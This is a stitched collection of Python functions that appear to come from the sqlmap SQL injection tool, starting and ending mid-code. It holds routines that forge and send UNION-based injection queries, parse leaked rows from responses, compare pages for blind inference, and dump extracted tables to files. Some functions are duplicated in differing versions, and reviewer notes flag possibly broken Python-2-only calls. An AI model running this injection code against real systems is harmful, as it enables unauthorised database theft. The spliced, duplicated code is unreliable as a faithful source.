                            if value and not re.match(r"\A[a-zA-Z0-9+/]+={0,2}\Z", value):
                                base64 = False
                                break

                            # NOTE(review): relies on the "base64" codec of
                            # str.decode() - presumably Python 2 only; confirm
                            try:
                                value.decode("base64")
                            except binascii.Error:
                                base64 = False
                                break

                        if base64:
                            for child in root:
                                child.attrib[column] = child.attrib.get(column, "").decode("base64") or NULL

                    # Rows are re-serialized into the start/delimiter/stop
                    # marker format
                    for child in root:
                        row = []
                        for column in kb.dumpColumns:
                            row.append(child.attrib.get(column, NULL))
                        retVal += "%s%s%s" % (kb.chars.start, kb.chars.delimiter.join(row), kb.chars.stop)

                # NOTE(review): any failure above is silently ignored,
                # leaving retVal at whatever it held at that moment
                except:
                    pass
                else:
                    retVal = getUnicode(retVal)

        if retVal is not None:
            retVal = getUnicode(retVal, kb.pageEncoding)

            # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection
            if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError():
                retVal = htmlunescape(retVal).replace("<br>", "\n")

            hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal)

        elif not kb.rowXmlMode:
            # Start marker found without the stop marker
            trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start))

            if trimmed:
                warnMsg = "possible server trimmed output detected "
                warnMsg += "(probably due to its length and/or content): "
                warnMsg += safecharencode(trimmed)
                logger.warn(warnMsg)
    else:
        # Value resumed from the session; only the duplicates flag is refreshed
        vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector
        kb.unionDuplicates = vector[7]

    return retVal
def hashKey(key):
    """
    Maps a key onto a non-negative integer fitting into 63 bits, derived
    from the MD5 digest of the key itself (when it is a text string) or of
    its repr() (for anything else)
    """

    if isinstance(key, six.text_type):
        source = key
    else:
        source = repr(key)

    hexDigest = hashlib.md5(getBytes(source)).hexdigest()

    # Reference: http://stackoverflow.com/a/4448400
    return int(hexDigest, 16) & 0x7fffffffffffffff
def escaper(value):
    """
    Renders value as the expression "CAST(X'<hex>' AS TEXT)", <hex> being
    the hexadecimal form of the value's bytes
    """

    # binascii.hexlify() returns bytes, which "%s" would render as
    # "b'...'" on Python 3, hence the conversion to text beforehand
    hexed = getUnicode(binascii.hexlify(getBytes(value)))

    # Reference: http://stackoverflow.com/questions/3444335/how-do-i-quote-a-utf-8-string-literal-in-sqlite3
    return "CAST(X'%s' AS TEXT)" % hexed
def _oneShotUnionUse(expression, unpack=True, limited=False):
    """
    Retrieves the output of the given expression through a single
    UNION-based request, unless a value for it is already stored in the
    session (hashDB), in which case that one is returned

    expression -- SQL expression whose output is wanted
    unpack     -- passed through to agent.concatQuery()
    limited    -- passed through to agent.forgeUnionQuery() (not used in
                  kb.rowXmlMode)

    Returns the extracted output or None when nothing could be extracted.
    Freshly retrieved non-None output is written back to the session.
    """

    retVal = hashDBRetrieve(
        "%s%s" % (conf.hexConvert or False, expression),
        checkConf=True)  # as UNION data is stored raw unconverted

    threadData = getCurrentThreadData()
    threadData.resumed = retVal is not None

    if retVal is None:
        vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector

        if not kb.rowXmlMode:
            injExpression = unescaper.escape(
                agent.concatQuery(expression, unpack))
            kb.unionDuplicates = vector[7]
            kb.forcePartialUnion = vector[8]
            query = agent.forgeUnionQuery(injExpression, vector[0], vector[1],
                                          vector[2], vector[3], vector[4],
                                          vector[5], vector[6], None, limited)
            where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[
                6]
        else:
            where = vector[6]
            query = agent.forgeUnionQuery(expression, vector[0], vector[1],
                                          vector[2], vector[3], vector[4],
                                          vector[5], vector[6], None, False)

        payload = agent.payload(newValue=query, where=where)

        # Perform the request
        page, headers, _ = Request.queryPage(payload,
                                             content=True,
                                             raise404=False)

        incrementCounter(PAYLOAD.TECHNIQUE.UNION)

        if not kb.rowXmlMode:
            # Parse the returned page to get the exact UNION-based
            # SQL injection output
            # (this helper rebinds the name `_` used for the discarded
            # element above; it searches the body first, then the headers)
            def _(regex):
                return firstNotNone(
                    extractRegexResult(regex,
                                       removeReflectiveValues(page, payload),
                                       re.DOTALL | re.IGNORECASE),
                    extractRegexResult(
                        regex,
                        removeReflectiveValues(
                            listToStrValue((
                                _ for _ in headers.headers
                                if not _.startswith(HTTP_HEADER.URI)
                            ) if headers else None), payload, True),
                        re.DOTALL | re.IGNORECASE))

            # Automatically patching last char trimming cases
            if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""):
                warnMsg = "automatically patching output having last char trimmed"
                singleTimeWarnMessage(warnMsg)
                page = page.replace(kb.chars.stop[:-1], kb.chars.stop)

            retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop))
        else:
            # Row XML mode: output is expected as a run of <row .../> elements
            output = extractRegexResult(r"(?P<result>(<row.+?/>)+)", page)
            if output:
                try:
                    root = xml.etree.ElementTree.fromstring(
                        safeStringFormat("<root>%s</root>", getBytes(output)))
                    retVal = ""
                    for column in kb.dumpColumns:
                        # Local flag (shadows any module named base64 inside
                        # this function): stays True only if the column's
                        # value passes the checks below in every row
                        base64 = True
                        for child in root:
                            value = child.attrib.get(column, "").strip()
                            if value and not re.match(
                                    r"\A[a-zA-Z0-9+/]+={0,2}\Z", value):
                                base64 = False
                                break

                            # NOTE(review): relies on the "base64" codec of
                            # str.decode() - presumably Python 2 only; confirm
                            try:
                                value.decode("base64")
                            except binascii.Error:
                                base64 = False
                                break

                        if base64:
                            for child in root:
                                child.attrib[column] = child.attrib.get(
                                    column, "").decode("base64") or NULL

                    # Rows are re-serialized into the start/delimiter/stop
                    # marker format
                    for child in root:
                        row = []
                        for column in kb.dumpColumns:
                            row.append(child.attrib.get(column, NULL))
                        retVal += "%s%s%s" % (kb.chars.start,
                                              kb.chars.delimiter.join(row),
                                              kb.chars.stop)

                # NOTE(review): any failure above is silently ignored,
                # leaving retVal at whatever it held at that moment
                except:
                    pass
                else:
                    retVal = getUnicode(retVal)

        if retVal is not None:
            retVal = getUnicode(retVal, kb.pageEncoding)

            # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection
            if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError():
                retVal = htmlunescape(retVal).replace("<br>", "\n")

            hashDBWrite("%s%s" % (conf.hexConvert or False, expression),
                        retVal)

        elif not kb.rowXmlMode:
            # Start marker found without the stop marker
            trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start))

            if trimmed:
                warnMsg = "possible server trimmed output detected "
                warnMsg += "(probably due to its length and/or content): "
                warnMsg += safecharencode(trimmed)
                logger.warn(warnMsg)
    else:
        # Value resumed from the session; only the duplicates flag is refreshed
        vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector
        kb.unionDuplicates = vector[7]

    return retVal
def checkCharEncoding(encoding, warn=True):
    """
    Checks encoding name, repairs common misspellings and adjusts to
    proper namings used in codecs module

    A list-like value is first reduced with unArrayizeValue(). A falsy
    value is returned as is, while None is returned for names that are
    placeholders, unknown to the codecs module or unable to decode a sample
    string (the latter case being logged when warn is set).

    >>> checkCharEncoding('iso-8858', False)
    'iso8859-1'
    >>> checkCharEncoding('en_us', False)
    'utf8'
    """

    if isListLike(encoding):
        encoding = unArrayizeValue(encoding)

    if encoding:
        encoding = encoding.lower()
    else:
        return encoding

    # Reference: http://www.destructor.de/charsets/index.htm
    translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}

    # Anything following one of these delimiters is not part of the name
    for delimiter in (';', ',', '('):
        if delimiter in encoding:
            encoding = encoding[:encoding.find(delimiter)].strip()

    # Quotes wrapping the value (HTML-escaped or raw) are not part of the
    # name either
    for quote in ("&quot;", '"'):
        encoding = encoding.replace(quote, "")

    # popular typos/errors (only the first matching repair is applied)
    typos = (
        ("8858", "8859"),  # iso-8858 -> iso-8859
        ("8559", "8859"),  # iso-8559 -> iso-8859
        ("8895", "8859"),  # iso-8895 -> iso-8859
        ("5889", "8859"),  # iso-5889 -> iso-8859
        ("5589", "8859"),  # iso-5589 -> iso-8859
        ("2313", "2312"),  # gb2313 -> gb2312
    )

    for typo, repaired in typos:
        if typo in encoding:
            encoding = encoding.replace(typo, repaired)
            break
    else:
        if encoding.startswith("x-"):
            encoding = encoding[len("x-"):]  # x-euc-kr -> euc-kr  /  x-mac-turkish -> mac-turkish
        elif "windows-cp" in encoding:
            encoding = encoding.replace("windows-cp", "windows")  # windows-cp-1254 -> windows-1254

    # name adjustment for compatibility
    if encoding.startswith("8859"):
        encoding = "iso-%s" % encoding
    elif encoding.startswith("cp-"):
        encoding = "cp%s" % encoding[3:]
    elif encoding.startswith("euc-"):
        encoding = "euc_%s" % encoding[4:]
    elif encoding.startswith("windows") and not encoding.startswith("windows-"):
        encoding = "windows-%s" % encoding[7:]
    elif encoding.find("iso-88") > 0:
        encoding = encoding[encoding.find("iso-88"):]
    elif encoding.startswith("is0-"):
        encoding = "iso%s" % encoding[4:]
    elif encoding.find("ascii") > 0:
        encoding = "ascii"
    elif encoding.find("utf8") > 0:
        encoding = "utf8"
    elif encoding.find("utf-8") > 0:
        encoding = "utf-8"

    # Reference: http://philip.html5.org/data/charsets-2.html
    if encoding in translate:
        encoding = translate[encoding]
    elif encoding in ("null", "{charset}", "charset", "*") or not re.search(r"\w", encoding):
        return None

    # Reference: http://www.iana.org/assignments/character-sets
    # Reference: http://docs.python.org/library/codecs.html
    try:
        codecs.lookup(encoding)
    except Exception:
        # best effort: an unusable name is dropped (without swallowing
        # KeyboardInterrupt/SystemExit as a bare except would)
        encoding = None

    if encoding:
        # Known codecs can still fail on actual data, hence the trial decoding
        try:
            six.text_type(getBytes(randomStr()), encoding)
        except Exception:
            if warn:
                warnMsg = "invalid web page charset '%s'" % encoding
                singleTimeLogMessage(warnMsg, logging.WARN, encoding)
            encoding = None

    return encoding
def escaper(value):
    """
    Renders value as the expression "CAST(X'<hex>' AS TEXT)", <hex> being
    the hexadecimal form of the value's bytes
    """

    hexed = getUnicode(binascii.hexlify(getBytes(value)))

    # Reference: http://stackoverflow.com/questions/3444335/how-do-i-quote-a-utf-8-string-literal-in-sqlite3
    return "CAST(X'%s' AS TEXT)" % hexed
def dbTableValues(self, tableValues):
    """
    Writes the content of a dumped table to the output (through
    self._write) and, depending on conf.dumpFormat, into a SQLite
    replication database or into a CSV/HTML dump file

    tableValues is a dictionary holding the special key "__infos__" (read
    here for its "db", "table" and "count" entries), while every other key
    is a column name mapped to a dictionary with "length" and "values"
    entries. Nothing is done when tableValues is None. When conf.api is
    set the structure is passed as is to self._write and no file is
    written.

    Raises SqlmapSystemException if neither the dump directory nor a
    temporary replacement directory could be created
    """

    replication = None
    rtable = None
    dumpFP = None
    appendToFile = False
    warnFile = False  # set when a fallback directory/file name had to be used

    if tableValues is None:
        return

    db = tableValues["__infos__"]["db"]
    if not db:
        db = "All"
    table = tableValues["__infos__"]["table"]

    if conf.api:
        self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
        return

    dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db))

    if conf.dumpFormat == DUMP_FORMAT.SQLITE:
        replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
    elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
        if not os.path.isdir(dumpDbPath):
            try:
                os.makedirs(dumpDbPath)
            except:
                warnFile = True

                # Second attempt: sanitized database name suffixed with a
                # short hash of the original one
                _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db))
                dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(getBytes(db)).hexdigest()[:8]))

                if not os.path.isdir(dumpDbPath):
                    try:
                        os.makedirs(dumpDbPath)
                    except Exception as ex:
                        # Last resort: a fresh temporary directory
                        try:
                            tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
                        except IOError as _:
                            errMsg = "unable to write to the temporary directory ('%s'). " % _
                            errMsg += "Please make sure that your disk is not full and "
                            errMsg += "that you have sufficient write permissions to "
                            errMsg += "create temporary files and/or directories"
                            raise SqlmapSystemException(errMsg)

                        warnMsg = "unable to create dump directory "
                        warnMsg += "'%s' (%s). " % (dumpDbPath, getSafeExString(ex))
                        warnMsg += "Using temporary directory '%s' instead" % tempDir
                        logger.warn(warnMsg)

                        dumpDbPath = tempDir

        # Path separators inside of the table name are replaced so that the
        # dump file stays inside of dumpDbPath
        dumpFileName = os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())))
        if not checkFile(dumpFileName, False):
            try:
                # Probe that the file can be created under that name
                openFile(dumpFileName, "w+b").close()
            except SqlmapSystemException:
                raise
            except:
                warnFile = True

                # Fall back to a sanitized name; the hash suffix is added when
                # sanitization shortened the name or (on Windows) the table
                # name is a reserved one
                _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
                if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
                    _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table))
                    dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(getBytes(table)).hexdigest()[:8], conf.dumpFormat.lower()))
                else:
                    dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
        else:
            # Dump file already exists: append to it when a row range was
            # requested, otherwise copy the old file aside before overwriting
            appendToFile = any((conf.limitStart, conf.limitStop))

            if not appendToFile:
                count = 1
                while True:
                    candidate = "%s.%d" % (dumpFileName, count)
                    if not checkFile(candidate, False):
                        try:
                            shutil.copyfile(dumpFileName, candidate)
                        except IOError:
                            pass
                        finally:
                            # Loop ends at the first free candidate name,
                            # whether or not the copy succeeded
                            break
                    else:
                        count += 1

        dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE)

    # From here on "count" is the number of rows to be dumped
    count = int(tableValues["__infos__"]["count"])
    separator = str()
    field = 1
    fields = len(tableValues) - 1  # presumably the number of columns (all keys except "__infos__")

    columns = prioritySortColumns(tableValues.keys())

    if conf.col:
        # Order by position inside of the user provided column list (columns
        # not found there get the key 0)
        cols = conf.col.split(',')
        columns = sorted(columns, key=lambda _: cols.index(_) if _ in cols else 0)

    # Horizontal table border, e.g. "+-----+--------+"
    for column in columns:
        if column != "__infos__":
            info = tableValues[column]
            lines = "-" * (int(info["length"]) + 2)
            separator += "+%s" % lines

    separator += "+"
    self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db else "Current database", unsafeSQLIdentificatorNaming(table)))

    if conf.dumpFormat == DUMP_FORMAT.SQLITE:
        cols = []

        # Column type guessing: INTEGER if all non-empty values pass int(),
        # else REAL if all of them pass float(), else TEXT
        for column in columns:
            if column != "__infos__":
                colType = Replication.INTEGER

                for value in tableValues[column]['values']:
                    try:
                        if not value or value == " ":  # NULL
                            continue

                        int(value)
                    except ValueError:
                        colType = None
                        break

                if colType is None:
                    colType = Replication.REAL

                    for value in tableValues[column]['values']:
                        try:
                            if not value or value == " ":  # NULL
                                continue

                            float(value)
                        except ValueError:
                            colType = None
                            break

                cols.append((unsafeSQLIdentificatorNaming(column), colType if colType else Replication.TEXT))

        rtable = replication.createTable(table, cols)
    elif conf.dumpFormat == DUMP_FORMAT.HTML:
        # HTML preamble up to the opening of the header row
        dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
        dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
        dataToDumpFile(dumpFP, "<meta name=\"generator\" content=\"%s\" />\n" % VERSION_STRING)
        dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
        dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
        dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n")

    if count == 1:
        self._write("[1 entry]")
    else:
        self._write("[%d entries]" % count)

    self._write(separator)

    # Header row (column names)
    for column in columns:
        if column != "__infos__":
            info = tableValues[column]

            column = unsafeSQLIdentificatorNaming(column)
            maxlength = int(info["length"])
            blank = " " * (maxlength - len(column))

            self._write("| %s%s" % (column, blank), newline=False)

            # Header goes into the file only when not appending to an
            # existing dump
            if not appendToFile:
                if conf.dumpFormat == DUMP_FORMAT.CSV:
                    if field == fields:
                        # Last field gets no trailing delimiter
                        dataToDumpFile(dumpFP, "%s" % safeCSValue(column))
                    else:
                        dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel))
                elif conf.dumpFormat == DUMP_FORMAT.HTML:
                    # NOTE(review): cgi.escape was removed in Python 3.8 - confirm the targeted interpreter versions
                    dataToDumpFile(dumpFP, "<th>%s</th>" % cgi.escape(column).encode("ascii", "xmlcharrefreplace"))

            field += 1

    if conf.dumpFormat == DUMP_FORMAT.HTML:
        dataToDumpFile(dumpFP, "\n</tr>\n</thead>\n<tbody>\n")

    self._write("|\n%s" % separator)

    if conf.dumpFormat == DUMP_FORMAT.CSV:
        dataToDumpFile(dumpFP, "\n" if not appendToFile else "")

    elif conf.dumpFormat == DUMP_FORMAT.SQLITE:
        rtable.beginTransaction()

    if count > TRIM_STDOUT_DUMP_SIZE:
        warnMsg = "console output will be trimmed to "
        warnMsg += "last %d rows due to " % TRIM_STDOUT_DUMP_SIZE
        warnMsg += "large table size"
        logger.warning(warnMsg)

    # Data rows
    for i in xrange(count):
        # Only the last TRIM_STDOUT_DUMP_SIZE rows are flagged for the console
        console = (i >= count - TRIM_STDOUT_DUMP_SIZE)
        field = 1
        values = []

        if conf.dumpFormat == DUMP_FORMAT.HTML:
            dataToDumpFile(dumpFP, "<tr>")

        for column in columns:
            if column != "__infos__":
                info = tableValues[column]

                # Column has fewer values than there are rows
                if len(info["values"]) <= i:
                    continue

                if info["values"][i] is None:
                    value = u''
                else:
                    value = getUnicode(info["values"][i])
                    value = DUMP_REPLACEMENTS.get(value, value)

                values.append(value)
                maxlength = int(info["length"])
                blank = " " * (maxlength - len(value))
                self._write("| %s%s" % (value, blank), newline=False, console=console)

                # Long values carrying "\x" sequences are checked for binary
                # content, which (if recognized) is stored into a separate file
                if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value:
                    try:
                        mimetype = magic.from_buffer(value, mime=True)
                        if any(mimetype.startswith(_) for _ in ("application", "image")):
                            if not os.path.isdir(dumpDbPath):
                                os.makedirs(dumpDbPath)

                            _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column)))
                            filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8)))
                            warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
                            logger.warn(warnMsg)

                            with open(filepath, "wb") as f:
                                _ = safechardecode(value, True)
                                f.write(_)
                    except magic.MagicException as ex:
                        logger.debug(getSafeExString(ex))

                if conf.dumpFormat == DUMP_FORMAT.CSV:
                    if field == fields:
                        dataToDumpFile(dumpFP, "%s" % safeCSValue(value))
                    else:
                        dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel))
                elif conf.dumpFormat == DUMP_FORMAT.HTML:
                    dataToDumpFile(dumpFP, "<td>%s</td>" % cgi.escape(value).encode("ascii", "xmlcharrefreplace"))

                field += 1

        # Row terminator for the chosen dump format
        if conf.dumpFormat == DUMP_FORMAT.SQLITE:
            try:
                rtable.insert(values)
            except SqlmapValueException:
                pass
        elif conf.dumpFormat == DUMP_FORMAT.CSV:
            dataToDumpFile(dumpFP, "\n")
        elif conf.dumpFormat == DUMP_FORMAT.HTML:
            dataToDumpFile(dumpFP, "</tr>\n")

        self._write("|", console=console)

    self._write("%s\n" % separator)

    # Finalization of the dump target
    if conf.dumpFormat == DUMP_FORMAT.SQLITE:
        rtable.endTransaction()
        logger.info("table '%s.%s' dumped to sqlite3 database '%s'" % (db, table, replication.dbpath))

    elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
        if conf.dumpFormat == DUMP_FORMAT.HTML:
            dataToDumpFile(dumpFP, "</tbody>\n</table>\n</body>\n</html>")
        else:
            dataToDumpFile(dumpFP, "\n")
        dumpFP.close()

        # Reported as a warning when a fallback path had to be used
        msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName)
        if not warnFile:
            logger.info(msg)
        else:
            logger.warn(msg)
def _comparison(page, headers, code, getRatioValue, pageLength):
    """
    Compares the given response against the stored page template
    (kb.pageTemplate)

    Returns:
      * result of the explicit user provided check (conf.string,
        conf.notString, conf.regexp or conf.code) when one is set
      * the similarity ratio when getRatioValue is set
      * True/False when the ratio is above UPPER_RATIO_BOUND/below
        LOWER_RATIO_BOUND, otherwise whether it exceeds kb.matchRatio by
        more than DIFF_TOLERANCE
      * None when no decision can be made (e.g. no page and no page length,
        ignored error page, missing content or kb.matchRatio not yet set)

    Side effects: updates the per-thread sequence matcher, may initialize
    kb.matchRatio and (in kb.testMode) stores the last compared
    headers/page/code/ratio into the thread data

    Raises SqlmapNoneDataException if the null connection comparison is
    used while the original page content is not available
    """

    threadData = getCurrentThreadData()

    if kb.testMode:
        # Headers are stored without the internal URI pseudo-header
        threadData.lastComparisonHeaders = listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else ""
        threadData.lastComparisonPage = page
        threadData.lastComparisonCode = code

    if page is None and pageLength is None:
        return None

    if any((conf.string, conf.notString, conf.regexp)):
        # User provided matching is done against headers followed by the page
        rawResponse = "%s%s" % (listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "", page)

        # String to match in page when the query is True and/or valid
        if conf.string:
            return conf.string in rawResponse

        # String to match in page when the query is False and/or invalid
        if conf.notString:
            return conf.notString not in rawResponse

        # Regular expression to match in page when the query is True and/or valid
        if conf.regexp:
            return re.search(conf.regexp, rawResponse, re.I | re.M) is not None

    # HTTP code to match when the query is valid
    if conf.code:
        return conf.code == code

    seqMatcher = threadData.seqMatcher
    seqMatcher.set_seq1(kb.pageTemplate)

    if page:
        # In case of an DBMS error page return None
        if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic:
            return None

        # Dynamic content lines to be excluded before comparison
        if not kb.nullConnection:
            page = removeDynamicContent(page)
            seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate))

        if not pageLength:
            pageLength = len(page)

    if kb.nullConnection and pageLength:
        # Only lengths are compared in this mode
        if not seqMatcher.a:
            errMsg = "problem occurred while retrieving original page content "
            errMsg += "which prevents sqlmap from continuation. Please rerun, "
            errMsg += "and if the problem persists turn off any optimization switches"
            raise SqlmapNoneDataException(errMsg)

        ratio = 1. * pageLength / len(seqMatcher.a)

        # Keep the ratio inside of (0, 1] regardless of which one is longer
        if ratio > 1.:
            ratio = 1. / ratio
    else:
        # Preventing "Unicode equal comparison failed to convert both arguments to Unicode"
        # (e.g. if one page is PDF and the other is HTML)
        if isinstance(seqMatcher.a, six.binary_type) and isinstance(page, six.text_type):
            page = getBytes(page, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")
        elif isinstance(seqMatcher.a, six.text_type) and isinstance(page, six.binary_type):
            seqMatcher.a = getBytes(seqMatcher.a, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")

        if any(_ is None for _ in (page, seqMatcher.a)):
            return None
        elif seqMatcher.a and page and seqMatcher.a == page:
            ratio = 1.
        elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)):
            # Sequence matching is skipped (on request or because of the
            # content size) in favor of the plain length ratio
            if not page or not seqMatcher.a:
                # Returned directly, regardless of getRatioValue
                return float(seqMatcher.a == page)
            else:
                ratio = 1. * len(seqMatcher.a) / len(page)
                if ratio > 1:
                    ratio = 1. / ratio
        else:
            seq1, seq2 = None, None

            if conf.titles:
                seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a)
                seq2 = extractRegexResult(HTML_TITLE_REGEX, page)
            else:
                seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a
                seq2 = getFilteredPageContent(page, True) if conf.textOnly else page

            if seq1 is None or seq2 is None:
                return None

            seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "")
            seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "")

            # Heavily dynamic pages are compared as sequences of lines
            if kb.heavilyDynamic:
                seq1 = seq1.split("\n")
                seq2 = seq2.split("\n")

            seqMatcher.set_seq1(seq1)
            seqMatcher.set_seq2(seq2)

            ratio = round(seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio(), 3)

    # If the url is stable and we did not set yet the match ratio and the
    # current injected value changes the url page content
    if kb.matchRatio is None:
        if ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND:
            kb.matchRatio = ratio
            logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio)

    if kb.testMode:
        threadData.lastComparisonRatio = ratio

    # If it has been requested to return the ratio and not a comparison
    # response
    if getRatioValue:
        return ratio

    elif ratio > UPPER_RATIO_BOUND:
        return True

    elif ratio < LOWER_RATIO_BOUND:
        return False

    elif kb.matchRatio is None:
        return None

    else:
        return (ratio - kb.matchRatio) > DIFF_TOLERANCE
def checkCharEncoding(encoding, warn=True):
    """
    Checks encoding name, repairs common misspellings and adjusts to
    proper namings used in codecs module

    The value may be a text string, a byte string or a list-like wrapper
    around one of those. A falsy value is returned unchanged. None is
    returned when the (repaired) name is a known placeholder, contains no
    word characters, is unknown to the codecs module or can not be used
    for decoding. If warn is True, a single-time warning is logged for a
    name that passes the codecs lookup but fails the decoding probe.

    >>> checkCharEncoding('iso-8858', False)
    'iso8859-1'
    >>> checkCharEncoding('en_us', False)
    'utf8'
    """

    if isListLike(encoding):
        encoding = unArrayizeValue(encoding)

    # Convert only after unwrapping so that a byte string held inside a
    # list-like value is normalized too (str delimiters below can not be
    # searched for inside of bytes on Python 3)
    if isinstance(encoding, six.binary_type):
        encoding = getUnicode(encoding)

    if encoding:
        encoding = encoding.lower()
    else:
        return encoding

    # Reference: http://www.destructor.de/charsets/index.htm
    translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}

    # Keep only the part in front of the first parameter-like delimiter
    for delimiter in (';', ',', '('):
        if delimiter in encoding:
            encoding = encoding[:encoding.find(delimiter)].strip()

    # Drop quoting leftovers, both HTML-escaped ("&quot") and literal ('"')
    encoding = encoding.replace("&quot", "").replace('"', "")

    # popular typos/errors (only the first matching repair is applied)
    if "8858" in encoding:
        encoding = encoding.replace("8858", "8859")  # iso-8858 -> iso-8859
    elif "8559" in encoding:
        encoding = encoding.replace("8559", "8859")  # iso-8559 -> iso-8859
    elif "8895" in encoding:
        encoding = encoding.replace("8895", "8859")  # iso-8895 -> iso-8859
    elif "5889" in encoding:
        encoding = encoding.replace("5889", "8859")  # iso-5889 -> iso-8859
    elif "5589" in encoding:
        encoding = encoding.replace("5589", "8859")  # iso-5589 -> iso-8859
    elif "2313" in encoding:
        encoding = encoding.replace("2313", "2312")  # gb2313 -> gb2312
    elif encoding.startswith("x-"):
        encoding = encoding[len("x-"):]              # x-euc-kr -> euc-kr  /  x-mac-turkish -> mac-turkish
    elif "windows-cp" in encoding:
        encoding = encoding.replace("windows-cp", "windows")  # windows-cp-1254 -> windows-1254

    # name adjustment for compatibility
    if encoding.startswith("8859"):
        encoding = "iso-%s" % encoding
    elif encoding.startswith("cp-"):
        encoding = "cp%s" % encoding[3:]
    elif encoding.startswith("euc-"):
        encoding = "euc_%s" % encoding[4:]
    elif encoding.startswith("windows") and not encoding.startswith("windows-"):
        encoding = "windows-%s" % encoding[7:]
    elif encoding.find("iso-88") > 0:
        # "> 0" on purpose: strips garbage in front of an embedded name
        encoding = encoding[encoding.find("iso-88"):]
    elif encoding.startswith("is0-"):
        encoding = "iso%s" % encoding[4:]
    elif encoding.find("ascii") > 0:
        encoding = "ascii"
    elif encoding.find("utf8") > 0:
        encoding = "utf8"
    elif encoding.find("utf-8") > 0:
        encoding = "utf-8"

    # Reference: http://philip.html5.org/data/charsets-2.html
    if encoding in translate:
        encoding = translate[encoding]
    elif encoding in ("null", "{charset}", "charset", "*") or not re.search(r"\w", encoding):
        return None

    # Reference: http://www.iana.org/assignments/character-sets
    # Reference: http://docs.python.org/library/codecs.html
    try:
        codecs.lookup(encoding)
    except Exception:
        # Exception (not a bare except) so that KeyboardInterrupt and
